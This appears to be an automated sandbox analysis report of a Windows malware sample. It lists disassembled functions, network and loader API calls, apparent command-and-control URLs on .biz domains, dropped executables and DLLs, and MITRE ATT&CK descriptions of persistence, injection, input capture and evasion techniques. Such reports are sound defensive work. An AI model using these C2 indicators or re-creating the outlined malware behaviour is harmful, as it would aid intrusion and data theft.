http://%s.biz/d/G?, xrefs: 00401D67

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: wsprintf$lstrcpylstrlen
String ID: %02X$http://%s.biz/d/G?
API String ID: 1876335253-1405168728
Opcode ID: 431e52c552cd2938decde32505303f6d5ae2ec4843de728c122ed91432e01b6a
Instruction ID: 281491f936d579379e8b64b5061a33f835f4fa42bec1d8e938d6b25608a27405
Opcode Fuzzy Hash: 431e52c552cd2938decde32505303f6d5ae2ec4843de728c122ed91432e01b6a
Instruction Fuzzy Hash: F3312631A042498BDB10DBE5C88179BBBF4AF41318F54463AE451AB2D6EB7CE945CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00401E00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123networkfileCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,?,?), ref: 00401E24
select.WS2_32(00000000,?,00000000,00000000,00000028), ref: 00401E67
recv.WS2_32(?,?,?,00000000), ref: 00401E77

Strings

(, xrefs: 00401E3B

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: FileInternetReadrecvselect
String ID: (
API String ID: 1361185869-3887548279
Opcode ID: df1e6bd9239c3bc88375c51d0e9c06735f3635883d634745b0060d18b0a6d90f
Instruction ID: 3ea35419ed2d3212b6131b0e69722baf812322277d3c9b307799a4a859a905b3
Opcode Fuzzy Hash: df1e6bd9239c3bc88375c51d0e9c06735f3635883d634745b0060d18b0a6d90f
Instruction Fuzzy Hash: 5941A1701083569BD3218F29C880B6BBBE4EF45320F14C66FF9D9962E2D3389841CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00401FBB Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000012,http://utbidet-ugeas.biz/d/rpt?), ref: 00401FD8
lstrcat.KERNEL32(00000000,00000012), ref: 00401FDE

Part of subcall function 004019E8: lstrcpy.KERNEL32(?,?), ref: 00401A14
Part of subcall function 004019E8: lstrlen.KERNEL32(00000000,?,?), ref: 00401A1A
Part of subcall function 004019E8: htons.WS2_32(00000050), ref: 00401A7B
Part of subcall function 004019E8: socket.WS2_32(00000002,00000001,00000006), ref: 00401AD6
Part of subcall function 004019E8: closesocket.WS2_32(00000000), ref: 00401AF9
Part of subcall function 004019E8: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Win32),00000004,00000000,00000000,00000000), ref: 00401C0F
Part of subcall function 004019E8: InternetSetOptionA.WININET(00000000,00000002,00000004), ref: 00401C35
Part of subcall function 004019E8: InternetSetOptionA.WININET(00000000,00000006,00000004,00000004), ref: 00401C41
Part of subcall function 004019E8: InternetSetOptionA.WININET(00000000,00000005,00000004,00000004), ref: 00401C4D

Part of subcall function 00401F59: InternetCloseHandle.WININET(?), ref: 00401F64
Part of subcall function 00401F59: InternetCloseHandle.WININET(00000000), ref: 00401F6C

Strings

urlinj_conn, xrefs: 00401FBB
http://utbidet-ugeas.biz/d/rpt?, xrefs: 00401FCE

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: Internet$Option$CloseHandlelstrcpy$Openclosesockethtonslstrcatlstrlensocket
String ID: http://utbidet-ugeas.biz/d/rpt?$urlinj_conn
API String ID: 1417007407-2018722472
Opcode ID: 160c73f2664787e70d104c44272e6d34a41457b2801fe17a4dc247fb701dc91f
Instruction ID: dcd2b2d7d85f2ee865dda91bc73112af5befebb961346a1fd4e47604b50803ab
Opcode Fuzzy Hash: 160c73f2664787e70d104c44272e6d34a41457b2801fe17a4dc247fb701dc91f
Instruction Fuzzy Hash: 06D012B164060756E710B3F6CC4ABAB218D9F44358FC0443A7148E51D1DABCD580566D

Uniqueness

Uniqueness Score: -1.00%

Function 0040385C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,RasEnumConnectionsA), ref: 00403874

Strings

RasEnumConnectionsA, xrefs: 0040385C, 0040386E
iphlpapi.dll, xrefs: 0040388A

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: AddressProc
String ID: RasEnumConnectionsA$iphlpapi.dll
API String ID: 190572456-2181992158
Opcode ID: 8db1fa8c4ac57291dcac78cdb1220f9509de1ccc7371f44f51738c5d27491f15
Instruction ID: 2bd81031e0f0fc3a03d94630145fcdd2a3789661c70154c2603156bb0e404be5
Opcode Fuzzy Hash: 8db1fa8c4ac57291dcac78cdb1220f9509de1ccc7371f44f51738c5d27491f15
Instruction Fuzzy Hash: EFD0172210864268C7052A7909810A92E98E517765338DFF7F1B3E90D6D3BCAAC34A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004038AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetIpAddrTable), ref: 004038C4

Strings

_Classes, xrefs: 004038DA
GetIpAddrTable, xrefs: 004038AC, 004038BE

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: AddressProc
String ID: GetIpAddrTable$_Classes
API String ID: 190572456-3592534314
Opcode ID: bcd1a865101a547805a78b1c32fdabf224cd4a56b1fd69fae467257179b7e29f
Instruction ID: 19f3e7cda966fd936d07cde807497132fe501c7d05929ad1586fdb7c28509cfa
Opcode Fuzzy Hash: bcd1a865101a547805a78b1c32fdabf224cd4a56b1fd69fae467257179b7e29f
Instruction Fuzzy Hash: CCD012216082436AC7116924088009E2D48E566765330CAF3F1A3E91D1D2BC99E2576E

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IEFO) debuggers. IEFOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., `C:\dbg\ntsd.exe -g notepad.exe` ).
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KJEfMLiuRS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\ogvubeak-omooc.dll

C:\Users\user\AppData\Roaming\tmp1D9F.tmp

C:\Windows\SysWOW64\atgusoon-odeas.exe

C:\Windows\SysWOW64\ivtahook-eaceab.dll

C:\Windows\SysWOW64\olfopeh-outix.exe

C:\Windows\SysWOW64\ubboonook.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Windows Analysis Report
KJEfMLiuRS.exe

Function 004033EB Relevance: 184.3, APIs: 32, Strings: 73, Instructions: 510
memoryCOMMON

Function 004035B5 Relevance: 43.9, APIs: 16, Strings: 9, Instructions: 175
libraryloadernativeCOMMONCrypto

Function 00403478 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 83
processlibraryloaderCOMMON

Function 00403FF5 Relevance: 59.7, APIs: 28, Strings: 6, Instructions: 189
registrystringsynchronizationCOMMON

Function 004042A2 Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 156
stringfiletimeCOMMON

Function 004010F7 Relevance: 15.1, APIs: 10, Instructions: 77
fileCOMMON

Function 00403E5D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
fileCOMMON

Function 00401000 Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Function 00404933 Relevance: 309.2, APIs: 140, Strings: 36, Instructions: 1235
stringfileregistryCOMMONCrypto

Function 0040265F Relevance: 68.9, APIs: 30, Strings: 9, Instructions: 697
registrytimesleepCOMMON

Function 0040318D Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 177
stringprocessmemoryCOMMON

Function 00404DB4 Relevance: 63.2, APIs: 30, Strings: 6, Instructions: 228
registryfilestringCOMMON

Function 0040457B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 233
stringregistryfileCOMMON

Function 0040211B Relevance: 52.7, APIs: 24, Strings: 6, Instructions: 243
filestringprocessCOMMON

Function 004019E8 Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 203
networkstringCOMMON

Function 00401832 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 127
registryCOMMON

Function 00402427 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 136
networkstringCOMMON

Function 0040395A Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57
libraryloaderCOMMON

Function 004030DE Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56
registryCOMMON

Function 00401038 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45
processfilesynchronizationCOMMON

Function 0040172D Relevance: 12.1, APIs: 8, Instructions: 82
networkCOMMON